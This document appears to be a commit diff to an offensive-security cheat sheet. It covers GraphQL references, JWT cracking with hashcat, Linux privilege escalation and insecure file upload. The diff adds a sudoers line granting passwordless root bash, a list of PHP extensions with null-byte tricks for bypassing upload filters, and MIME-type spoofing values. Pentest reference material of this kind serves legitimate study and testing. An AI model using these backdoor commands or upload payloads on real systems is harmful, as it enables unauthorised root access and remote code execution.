PrivEsc - sudoers + Upload PHP

GraphQL Injection/README.md

@@ -243,4 +243,5 @@ curl -X POST http://localhost:8080/graphql\?embedded_submission_form_uuid\=1%27%
 * [How to set up a GraphQL Server using Node.js, Express & MongoDB - 5 NOVEMBER 2018 - Leonardo Maldonado](https://www.freecodecamp.org/news/how-to-set-up-a-graphql-server-using-node-js-express-mongodb-52421b73f474/)
 * [GraphQL cheatsheet - DEVHINTS.IO](https://devhints.io/graphql)
 * [HIP19 Writeup - Meet Your Doctor 1,2,3 - June 22, 2019 - Swissky](https://swisskyrepo.github.io/HIP19-MeetYourDoctor/)
-* [Introspection query leaks sensitive graphql system information - @Zuriel](https://hackerone.com/reports/291531)
+* [Introspection query leaks sensitive graphql system information - @Zuriel](https://hackerone.com/reports/291531)
+* [Graphql Bug to Steal Anyone’s Address - Sept 1, 2019 - Pratik Yadav](https://medium.com/@pratiky054/graphql-bug-to-steal-anyones-address-fc34f0374417)

JSON Web Token/README.md

@@ -250,7 +250,7 @@ Secret is "Sn1f"
 
 ### Hashcat
 
-> Support added to crack JWT (JSON Web Token) with hashcat at 365MH/s on a single GTX1080 - [src](twitter.com/hashcat/status/955154646494040065)
+> Support added to crack JWT (JSON Web Token) with hashcat at 365MH/s on a single GTX1080 - [src](https://twitter.com/hashcat/status/955154646494040065)
 
 ```bash
 /hashcat -m 16500 hash.txt -a 3 -w 3 ?a?a?a?a?a?a

Methodology and Resources/Linux - Privilege Escalation.md

@@ -84,7 +84,7 @@
   * Checks if password hashes are stored in /etc/passwd
   * Extract full details for 'default' uid's such as 0, 1000, 1001 etc
   * Attempt to read restricted files i.e. /etc/shadow
-  * List current users history files (i.e .bash_history, .nano_history etc.)
+  * List current users history files (i.e .bash_history, .nano_history, .mysql_history , etc.)
   * Basic SSH checks
 * Privileged access:
   * Which users have recently used sudo
@@ -455,9 +455,9 @@ echo "username ALL=(ALL:ALL) ALL">>/etc/sudoers
 
 # use SUDO without password
 echo "username ALL=(ALL) NOPASSWD: ALL" >>/etc/sudoers
+echo "username ALL=NOPASSWD: /bin/bash" >>/etc/sudoers
 ```
 
-
 ## NFS Root Squashing
 
 When **no_root_squash** appears in `/etc/exports`, the folder is shareable and a remote user can mount it
@@ -620,7 +620,7 @@ Precompiled exploits can be found inside these repositories, run them at your ow
 * [bin-sploits - @offensive-security](https://github.com/offensive-security/exploitdb-bin-sploits/tree/master/bin-sploits)
 * [kernel-exploits - @lucyoa](https://github.com/lucyoa/kernel-exploits/)
 
-The following exploits are known to work well.
+The following exploits are known to work well, search for another exploits using `searchsploit -w linux kernel centos`.
 
 ### CVE-2016-5195 (DirtyCow)
 

Upload Insecure Files/Extension PHP/extensions.lst

@@ -0,0 +1,20 @@
+.jpeg.php
+.jpg.php
+.png.php
+.php
+.php3
+.php4
+.php5
+.php7
+.pht
+.phar
+.phpt
+.pgif
+.phtml
+.phtm
+.php%00.gif
+.php\x00.gif
+.php%00.png
+.php\x00.png
+.php%00.jpg
+.php\x00.jpg

Upload Insecure Files/README.md

@@ -54,8 +54,17 @@ Coldfusion: .cfm, .cfml, .cfc, .dbm
 
 ### Upload tricks
 
-- Null byte (eg: shell.php%00.gif, shell.php%00.png), works well against `pathinfo()`
+- Null byte (works well against `pathinfo()`)
+    * .php%00.gif
+    * .php\x00.gif
+    * .php%00.png
+    * .php\x00.png
+    * .php%00.jpg
+    * .php\x00.jpg
 - Mime type, change `Content-Type : application/x-php` or `Content-Type : application/octet-stream` to `Content-Type : image/gif`
+    * `Content-Type : image/gif`
+    * `Content-Type : image/png`
+    * `Content-Type : image/jpeg`
 
 ### Picture upload with LFI